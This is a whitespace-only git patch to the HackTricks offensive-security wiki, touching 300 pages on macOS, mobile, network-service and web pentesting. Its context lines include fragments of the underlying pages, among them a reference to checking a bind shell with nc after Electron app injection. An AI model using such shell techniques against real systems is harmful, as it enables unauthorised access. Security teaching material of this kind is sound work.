From ad3f52d7256c0d282cff444896142b51e8185ed4 Mon Sep 17 00:00:00 2001 
From: Carlos Polop
Date: Fri, 3 Jan 2025 01:07:38 +0100
Subject: [PATCH] t2
---
 .../mac-os-architecture/README.md | 1 +
 .../macos-ipc-inter-process-communication/README.md | 1 +
 .../mac-os-architecture/macos-kernel-extensions.md | 1 +
 .../mac-os-architecture/macos-kernel-vulnerabilities.md | 1 +
 .../mac-os-architecture/macos-system-extensions.md | 1 +
 .../macos-apps-inspecting-debugging-and-fuzzing/README.md | 1 +
 .../arm64-basic-assembly.md | 1 +
 .../introduction-to-x64.md | 1 +
 .../objects-in-memory.md | 1 +
 .../macos-files-folders-and-binaries/README.md | 1 +
 .../macos-files-folders-and-binaries/macos-bundles.md | 1 +
 .../macos-files-folders-and-binaries/macos-installers-abuse.md | 1 +
 .../macos-files-folders-and-binaries/macos-memory-dumping.md | 1 +
 .../macos-sensitive-locations.md | 1 +
 .../universal-binaries-and-mach-o-format.md | 1 +
 .../macos-proces-abuse/README.md | 1 +
 .../macos-proces-abuse/macos-.net-applications-injection.md | 1 +
 .../macos-proces-abuse/macos-chromium-injection.md | 1 +
 .../macos-proces-abuse/macos-dirty-nib.md | 1 +
 .../macos-proces-abuse/macos-electron-applications-injection.md | 1 +
 .../macos-proces-abuse/macos-function-hooking.md | 1 +
 .../macos-ipc-inter-process-communication/README.md | 1 +
 .../macos-mig-mach-interface-generator.md | 1 +
 .../macos-thread-injection-via-task-port.md | 1 +
 .../macos-ipc-inter-process-communication/macos-xpc/README.md | 1 +
 .../macos-xpc/macos-xpc-authorization.md | 1 +
 .../macos-xpc/macos-xpc-connecting-process-check/README.md | 1 +
 .../macos-xpc-connecting-process-check/macos-pid-reuse.md | 1 +
 .../macos-xpc_connection_get_audit_token-attack.md | 1 +
 .../macos-proces-abuse/macos-java-apps-injection.md | 1 +
 .../macos-proces-abuse/macos-library-injection/README.md | 1 +
 .../macos-dyld-hijacking-and-dyld_insert_libraries.md | 1 +
 .../macos-library-injection/macos-dyld-process.md | 1 +
 .../macos-proces-abuse/macos-perl-applications-injection.md | 1 +
 .../macos-proces-abuse/macos-python-applications-injection.md | 1 +
 .../macos-proces-abuse/macos-ruby-applications-injection.md | 1 +
 .../macos-security-protections/README.md | 1 +
 .../macos-amfi-applemobilefileintegrity.md | 1 +
 .../macos-authorizations-db-and-authd.md | 1 +
 .../macos-security-protections/macos-code-signing.md | 1 +
 .../macos-security-protections/macos-dangerous-entitlements.md | 1 +
 .../macos-security-protections/macos-fs-tricks/README.md | 1 +
 .../macos-fs-tricks/macos-xattr-acls-extra-stuff.md | 1 +
 .../macos-security-protections/macos-gatekeeper.md | 1 +
 .../macos-launch-environment-constraints.md | 1 +
 .../macos-macf-mandatory-access-control-framework.md | 1 +
 .../macos-security-protections/macos-sandbox/README.md | 1 +
 .../macos-sandbox/macos-default-sandbox-debug.md | 1 +
 .../macos-sandbox/macos-sandbox-debug-and-bypass/README.md | 1 +
 .../macos-office-sandbox-bypasses.md | 1 +
 .../macos-security-protections/macos-sip.md | 1 +
 .../macos-security-protections/macos-tcc/README.md | 1 +
 .../macos-security-protections/macos-tcc/macos-apple-events.md | 1 +
 .../macos-tcc/macos-tcc-bypasses/README.md | 1 +
 .../macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md | 1 +
 .../macos-security-protections/macos-tcc/macos-tcc-payloads.md | 1 +
 src/misc/references.md | 1 +
 src/mobile-pentesting/android-app-pentesting/README.md | 1 +
 src/mobile-pentesting/android-app-pentesting/adb-commands.md | 1 +
 .../android-app-pentesting/android-applications-basics.md | 1 +
 .../android-app-pentesting/android-task-hijacking.md | 1 +
 src/mobile-pentesting/android-app-pentesting/apk-decompilers.md | 1 +
 .../android-app-pentesting/avd-android-virtual-device.md | 1 +
 .../bypass-biometric-authentication-android.md | 1 +
 .../android-app-pentesting/content-protocol.md | 1 +
 .../android-app-pentesting/drozer-tutorial/README.md | 1 +
 .../drozer-tutorial/exploiting-content-providers.md | 1 +
 .../exploiting-a-debuggeable-applciation.md | 1 +
 .../android-app-pentesting/frida-tutorial/README.md | 1 +
 .../android-app-pentesting/frida-tutorial/frida-tutorial-1.md | 1 +
 .../android-app-pentesting/frida-tutorial/frida-tutorial-2.md | 1 +
 .../android-app-pentesting/frida-tutorial/objection-tutorial.md | 1 +
 .../android-app-pentesting/frida-tutorial/owaspuncrackable-1.md | 1 +
 .../google-ctf-2018-shall-we-play-a-game.md | 1 +
 .../android-app-pentesting/install-burp-certificate.md | 1 +
 .../android-app-pentesting/intent-injection.md | 1 +
 .../android-app-pentesting/make-apk-accept-ca-certificate.md | 1 +
 .../android-app-pentesting/manual-deobfuscation.md | 1 +
 .../android-app-pentesting/react-native-application.md | 1 +
 .../android-app-pentesting/reversing-native-libraries.md | 1 +
 src/mobile-pentesting/android-app-pentesting/smali-changes.md | 1 +
 .../spoofing-your-location-in-play-store.md | 1 +
 src/mobile-pentesting/android-app-pentesting/tapjacking.md | 1 +
 src/mobile-pentesting/android-app-pentesting/webview-attacks.md | 1 +
 src/mobile-pentesting/android-checklist.md | 1 +
 src/mobile-pentesting/cordova-apps.md | 1 +
 src/mobile-pentesting/ios-pentesting-checklist.md | 1 +
 src/mobile-pentesting/ios-pentesting/README.md | 1 +
 .../ios-pentesting/basic-ios-testing-operations.md | 1 +
 .../ios-pentesting/burp-configuration-for-ios.md | 1 +
 .../extracting-entitlements-from-compiled-application.md | 1 +
 .../ios-pentesting/frida-configuration-in-ios.md | 1 +
 src/mobile-pentesting/ios-pentesting/ios-app-extensions.md | 1 +
 src/mobile-pentesting/ios-pentesting/ios-basics.md | 1 +
 .../ios-custom-uri-handlers-deeplinks-custom-schemes.md | 1 +
 .../ios-pentesting/ios-hooking-with-objection.md | 1 +
 src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md | 1 +
 .../ios-pentesting/ios-serialisation-and-encoding.md | 1 +
 src/mobile-pentesting/ios-pentesting/ios-testing-environment.md | 1 +
 src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md | 1 +
 src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md | 1 +
 src/mobile-pentesting/ios-pentesting/ios-universal-links.md | 1 +
 src/mobile-pentesting/ios-pentesting/ios-webviews.md | 1 +
 src/mobile-pentesting/xamarin-apps.md | 1 +
 .../10000-network-data-management-protocol-ndmp.md | 1 +
 src/network-services-pentesting/1026-pentesting-rusersd.md | 1 +
 src/network-services-pentesting/1080-pentesting-socks.md | 1 +
 src/network-services-pentesting/1099-pentesting-java-rmi.md | 1 +
 src/network-services-pentesting/11211-memcache/README.md | 1 +
 .../11211-memcache/memcache-commands.md | 1 +
 src/network-services-pentesting/113-pentesting-ident.md | 1 +
 src/network-services-pentesting/135-pentesting-msrpc.md | 1 +
 .../137-138-139-pentesting-netbios.md | 1 +
 src/network-services-pentesting/1414-pentesting-ibmmq.md | 1 +
 .../1521-1522-1529-pentesting-oracle-listener.md | 1 +
 .../1521-1522-1529-pentesting-oracle-listener/README.md | 1 +
 .../15672-pentesting-rabbitmq-management.md | 1 +
 src/network-services-pentesting/1723-pentesting-pptp.md | 1 +
 .../1883-pentesting-mqtt-mosquitto.md | 1 +
 src/network-services-pentesting/2375-pentesting-docker.md | 1 +
 .../24007-24008-24009-49152-pentesting-glusterfs.md | 1 +
 src/network-services-pentesting/27017-27018-mongodb.md | 1 +
 src/network-services-pentesting/3128-pentesting-squid.md | 1 +
 src/network-services-pentesting/3260-pentesting-iscsi.md | 1 +
 src/network-services-pentesting/3299-pentesting-saprouter.md | 1 +
 src/network-services-pentesting/3632-pentesting-distcc.md | 1 +
 .../3690-pentesting-subversion-svn-server.md | 1 +
 .../3702-udp-pentesting-ws-discovery.md | 1 +
 src/network-services-pentesting/43-pentesting-whois.md | 1 +
 .../4369-pentesting-erlang-port-mapper-daemon-epmd.md | 1 +
 src/network-services-pentesting/44134-pentesting-tiller-helm.md | 1 +
 src/network-services-pentesting/44818-ethernetip.md | 1 +
 src/network-services-pentesting/47808-udp-bacnet.md | 1 +
 src/network-services-pentesting/4786-cisco-smart-install.md | 1 +
 src/network-services-pentesting/4840-pentesting-opc-ua.md | 1 +
 src/network-services-pentesting/49-pentesting-tacacs+.md | 1 +
 .../5000-pentesting-docker-registry.md | 1 +
 .../50030-50060-50070-50075-50090-pentesting-hadoop.md | 1 +
 src/network-services-pentesting/512-pentesting-rexec.md | 1 +
 .../515-pentesting-line-printer-daemon-lpd.md | 1 +
 src/network-services-pentesting/5353-udp-multicast-dns-mdns.md | 1 +
 src/network-services-pentesting/5439-pentesting-redshift.md | 1 +
 src/network-services-pentesting/554-8554-pentesting-rtsp.md | 1 +
 src/network-services-pentesting/5555-android-debug-bridge.md | 1 +
 src/network-services-pentesting/5601-pentesting-kibana.md | 1 +
 src/network-services-pentesting/5671-5672-pentesting-amqp.md | 1 +
 src/network-services-pentesting/584-pentesting-afp.md | 1 +
 src/network-services-pentesting/5984-pentesting-couchdb.md | 1 +
 src/network-services-pentesting/5985-5986-pentesting-omi.md | 1 +
 src/network-services-pentesting/5985-5986-pentesting-winrm.md | 1 +
 src/network-services-pentesting/6000-pentesting-x11.md | 1 +
 src/network-services-pentesting/623-udp-ipmi.md | 1 +
 src/network-services-pentesting/6379-pentesting-redis.md | 1 +
 src/network-services-pentesting/69-udp-tftp.md | 1 +
 src/network-services-pentesting/7-tcp-udp-pentesting-echo.md | 1 +
 src/network-services-pentesting/700-pentesting-epp.md | 1 +
 .../8009-pentesting-apache-jserv-protocol-ajp.md | 1 +
 src/network-services-pentesting/8086-pentesting-influxdb.md | 2 +-
 src/network-services-pentesting/8089-splunkd.md | 1 +
 .../8333-18333-38333-18444-pentesting-bitcoin.md | 1 +
 src/network-services-pentesting/873-pentesting-rsync.md | 1 +
 src/network-services-pentesting/9000-pentesting-fastcgi.md | 1 +
 src/network-services-pentesting/9001-pentesting-hsqldb.md | 1 +
 src/network-services-pentesting/9100-pjl.md | 1 +
 .../9200-pentesting-elasticsearch.md | 1 +
 src/network-services-pentesting/cassandra.md | 1 +
 src/network-services-pentesting/ipsec-ike-vpn-pentesting.md | 1 +
 src/network-services-pentesting/nfs-service-pentesting.md | 1 +
 .../pentesting-264-check-point-firewall-1.md | 1 +
 .../pentesting-631-internet-printing-protocol-ipp.md | 1 +
 .../pentesting-compaq-hp-insight-manager.md | 1 +
 src/network-services-pentesting/pentesting-dns.md | 1 +
 src/network-services-pentesting/pentesting-finger.md | 1 +
 src/network-services-pentesting/pentesting-ftp/README.md | 1 +
 .../pentesting-ftp/ftp-bounce-attack.md | 1 +
 .../pentesting-ftp/ftp-bounce-download-2oftp-file.md | 1 +
 src/network-services-pentesting/pentesting-imap.md | 1 +
 src/network-services-pentesting/pentesting-irc.md | 1 +
 .../pentesting-jdwp-java-debug-wire-protocol.md | 1 +
 .../pentesting-kerberos-88/README.md | 1 +
 .../pentesting-kerberos-88/harvesting-tickets-from-linux.md | 1 +
 .../pentesting-kerberos-88/harvesting-tickets-from-windows.md | 1 +
 src/network-services-pentesting/pentesting-ldap.md | 1 +
 src/network-services-pentesting/pentesting-modbus.md | 1 +
 .../pentesting-mssql-microsoft-sql-server/README.md | 1 +
 .../types-of-mssql-users.md | 1 +
 src/network-services-pentesting/pentesting-mysql.md | 1 +
 src/network-services-pentesting/pentesting-ntp.md | 1 +
 src/network-services-pentesting/pentesting-pop.md | 1 +
 src/network-services-pentesting/pentesting-postgresql.md | 1 +
 src/network-services-pentesting/pentesting-rdp.md | 1 +
 src/network-services-pentesting/pentesting-remote-gdbserver.md | 1 +
 src/network-services-pentesting/pentesting-rlogin.md | 1 +
 src/network-services-pentesting/pentesting-rpcbind.md | 1 +
 src/network-services-pentesting/pentesting-rsh.md | 1 +
 src/network-services-pentesting/pentesting-sap.md | 1 +
 src/network-services-pentesting/pentesting-smb.md | 1 +
 src/network-services-pentesting/pentesting-smb/README.md | 1 +
 .../pentesting-smb/rpcclient-enumeration.md | 1 +
 src/network-services-pentesting/pentesting-smtp/README.md | 1 +
 .../pentesting-smtp/smtp-commands.md | 1 +
 .../pentesting-smtp/smtp-smuggling.md | 1 +
 src/network-services-pentesting/pentesting-snmp/README.md | 1 +
 src/network-services-pentesting/pentesting-snmp/cisco-snmp.md | 1 +
 src/network-services-pentesting/pentesting-snmp/snmp-rce.md | 1 +
 src/network-services-pentesting/pentesting-ssh.md | 1 +
 src/network-services-pentesting/pentesting-telnet.md | 1 +
 src/network-services-pentesting/pentesting-vnc.md | 1 +
 src/network-services-pentesting/pentesting-voip/README.md | 1 +
 .../pentesting-voip/basic-voip-protocols/README.md | 1 +
 .../basic-voip-protocols/sip-session-initiation-protocol.md | 1 +
 .../pentesting-web/403-and-401-bypasses.md | 1 +
 src/network-services-pentesting/pentesting-web/README.md | 1 +
 .../pentesting-web/aem-adobe-experience-cloud.md | 1 +
 src/network-services-pentesting/pentesting-web/angular.md | 1 +
 src/network-services-pentesting/pentesting-web/apache.md | 1 +
 .../pentesting-web/artifactory-hacking-guide.md | 1 +
 src/network-services-pentesting/pentesting-web/bolt-cms.md | 1 +
 .../pentesting-web/buckets/README.md | 1 +
 .../pentesting-web/buckets/firebase-database.md | 1 +
 src/network-services-pentesting/pentesting-web/cgi.md | 1 +
 .../pentesting-web/code-review-tools.md | 1 +
 src/network-services-pentesting/pentesting-web/django.md | 1 +
 .../pentesting-web/dotnetnuke-dnn.md | 1 +
 src/network-services-pentesting/pentesting-web/drupal/README.md | 1 +
 .../pentesting-web/drupal/drupal-rce.md | 1 +
 .../pentesting-web/electron-desktop-apps/README.md | 1 +
 .../electron-contextisolation-rce-via-electron-internal-code.md | 1 +
 .../electron-contextisolation-rce-via-ipc.md | 1 +
 .../electron-contextisolation-rce-via-preload-code.md | 1 +
 src/network-services-pentesting/pentesting-web/flask.md | 1 +
 src/network-services-pentesting/pentesting-web/git.md | 1 +
 src/network-services-pentesting/pentesting-web/golang.md | 1 +
 src/network-services-pentesting/pentesting-web/grafana.md | 1 +
 src/network-services-pentesting/pentesting-web/graphql.md | 1 +
 .../pentesting-web/gwt-google-web-toolkit.md | 1 +
 .../pentesting-web/h2-java-sql-database.md | 1 +
 .../pentesting-web/iis-internet-information-services.md | 1 +
 .../pentesting-web/imagemagick-security.md | 1 +
 src/network-services-pentesting/pentesting-web/jboss.md | 1 +
 src/network-services-pentesting/pentesting-web/jira.md | 1 +
 src/network-services-pentesting/pentesting-web/joomla.md | 1 +
 src/network-services-pentesting/pentesting-web/jsp.md | 1 +
 src/network-services-pentesting/pentesting-web/laravel.md | 1 +
 src/network-services-pentesting/pentesting-web/moodle.md | 1 +
 src/network-services-pentesting/pentesting-web/nextjs-1.md | 1 +
 src/network-services-pentesting/pentesting-web/nextjs.md | 1 +
 src/network-services-pentesting/pentesting-web/nginx.md | 1 +
 .../pentesting-web/nodejs-express.md | 1 +
 .../pentesting-web/php-tricks-esp/README.md | 1 +
 .../php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md | 1 +
 .../pentesting-web/php-tricks-esp/php-ssrf.md | 1 +
 .../README.md | 1 +
 .../disable_functions-bypass-dl-function.md | 1 +
 ...pass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md | 1 +
 .../disable_functions-bypass-mod_cgi.md | 1 +
 ...unctions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md | 1 +
 .../disable_functions-bypass-php-5.2-fopen-exploit.md | 1 +
 ...unctions-bypass-php-5.2.3-win32std-ext-protections-bypass.md | 1 +
 .../disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md | 1 +
 .../disable_functions-bypass-php-7.0-7.4-nix-only.md | 1 +
 .../disable_functions-bypass-php-fpm-fastcgi.md | 1 +
 .../disable_functions-bypass-php-less-than-5.2.9-on-windows.md | 1 +
 ...ctions-bypass-php-perl-extension-safe_mode-bypass-exploit.md | 1 +
 ..._mode-bypass-via-proc_open-and-custom-environment-exploit.md | 1 +
 .../disable_functions-bypass-via-mem.md | 1 +
 .../disable_functions-php-5.2.4-ioncube-extension-exploit.md | 1 +
 .../disable_functions-php-5.x-shellshock-exploit.md | 1 +
 src/network-services-pentesting/pentesting-web/prestashop.md | 1 +
 .../pentesting-web/put-method-webdav.md | 1 +
 src/network-services-pentesting/pentesting-web/python.md | 1 +
 src/network-services-pentesting/pentesting-web/rocket-chat.md | 1 +
 .../pentesting-web/special-http-headers.md | 1 +
 .../pentesting-web/spring-actuators.md | 1 +
 src/network-services-pentesting/pentesting-web/symphony.md | 1 +
 src/network-services-pentesting/pentesting-web/tomcat/README.md | 1 +
 .../pentesting-web/uncovering-cloudflare.md | 1 +
 .../pentesting-web/vmware-esx-vcenter....md | 1 +
 .../pentesting-web/web-api-pentesting.md | 1 +
 src/network-services-pentesting/pentesting-web/werkzeug.md | 1 +
 src/network-services-pentesting/pentesting-web/wordpress.md | 1 +
 src/pentesting-web/2fa-bypass.md | 1 +
 src/pentesting-web/abusing-hop-by-hop-headers.md | 1 +
 src/pentesting-web/account-takeover.md | 1 +
 src/pentesting-web/bypass-payment-process.md | 1 +
 src/pentesting-web/captcha-bypass.md | 1 +
 src/pentesting-web/clickjacking.md | 1 +
 src/pentesting-web/client-side-path-traversal.md | 1 +
 src/pentesting-web/client-side-template-injection-csti.md | 1 +
 src/pentesting-web/command-injection.md | 1 +
 src/pentesting-web/cors-bypass.md | 1 +
 src/pentesting-web/crlf-0d-0a.md | 1 +
 src/pentesting-web/csrf-cross-site-request-forgery.md | 1 +
 src/pentesting-web/dependency-confusion.md | 1 +
 src/pentesting-web/domain-subdomain-takeover.md | 1 +
 src/pentesting-web/email-injections.md | 1 +
 .../formula-csv-doc-latex-ghostscript-injection.md | 1 +
 src/pentesting-web/grpc-web-pentest.md | 1 +
 src/pentesting-web/h2c-smuggling.md | 1 +
 src/pentesting-web/http-connection-contamination.md | 1 +
 300 files changed, 300 insertions(+), 1 deletion(-)
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
index 5b8b45324..4280561a8 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
@@ -71,3 +71,4 @@ macos-system-extensions.md
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
index a90363d6b..f5f7102ce 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
@@ -851,3 +851,4 @@ For more info check:
 {{#include ../../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
index 627f62657..e0a163bda 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
@@ -150,3 +150,4 @@ nm -a binaries/com.apple.security.sandbox | wc -l
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md
index a41b2c95e..b297299b0 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-vulnerabilities.md
@@ -10,3 +10,4 @@
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
index 6a9ebaa76..06f89953f 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
@@ -83,3 +83,4 @@ At the end this was fixed by giving the new permission **`kTCCServiceEndpointSec
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
index edfa75be9..b0aae39d5 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
@@ -635,3 +635,4 @@ litefuzz -s -a tcp://localhost:5900 -i input/screenshared-session --reportcrash
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
index 8ac0195ef..be78c22be 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
@@ -797,3 +797,4 @@ call_execve:
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md
index ca201bd6d..7d1dbe1d2 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/introduction-to-x64.md
@@ -444,3 +444,4 @@ dup2:
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/objects-in-memory.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/objects-in-memory.md
index a822ef393..3c61226b3 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/objects-in-memory.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/objects-in-memory.md
@@ -153,3 +153,4 @@ During runtime and additional structure `class_rw_t` is used containing pointers
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
index 92475ce28..27cb6f957 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md
@@ -270,3 +270,4 @@ The directory `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md
index c9a581ed8..7c50b0ed1 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md
@@ -44,3 +44,4 @@ For more detailed information on `Info.plist` keys and their meanings, the Apple
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
index bb1fb251f..0e4043961 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-installers-abuse.md
@@ -166,3 +166,4 @@ productbuild --distribution dist.xml --package-path myapp.pkg final-installer.pk
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
index 0f2b56672..6c4d85d7d 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md
@@ -55,3 +55,4 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md
index 53f9819c1..555d6012f 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md
@@ -275,3 +275,4 @@ These are notifications that the user should see in the screen:
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
index a8c97c15a..bbbffc1e9 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/universal-binaries-and-mach-o-format.md
@@ -414,3 +414,4 @@ In `__DATA` segment (rw-):
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
index 172e77dba..4884e4bda 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
@@ -277,3 +277,4 @@ Note that to call that function you need to be **the same uid** as the one runni
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
index 5c949ac6b..69171ae13 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md
@@ -120,3 +120,4 @@ The full POC code for injection into PowerShell is accessible [here](https://gis
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.md
index 3bda31856..0e64c06c3 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-chromium-injection.md
@@ -35,3 +35,4 @@ Find more examples in the tools links
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
index e7d9935fa..1d56599c9 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-dirty-nib.md
@@ -73,3 +73,4 @@ From macOS Sonoma onwards, modifications inside App bundles are restricted. Howe
 {{#include ../../../banners/hacktricks-training.md}}
+
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
index e83d9cc23..f5c053b02 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md
@@ -270,3 +270,4 @@ Shell binding requested. Check `nc 127.0.0.1 12345`
 {{#include ../../../banners/hacktricks-training.md}}
+
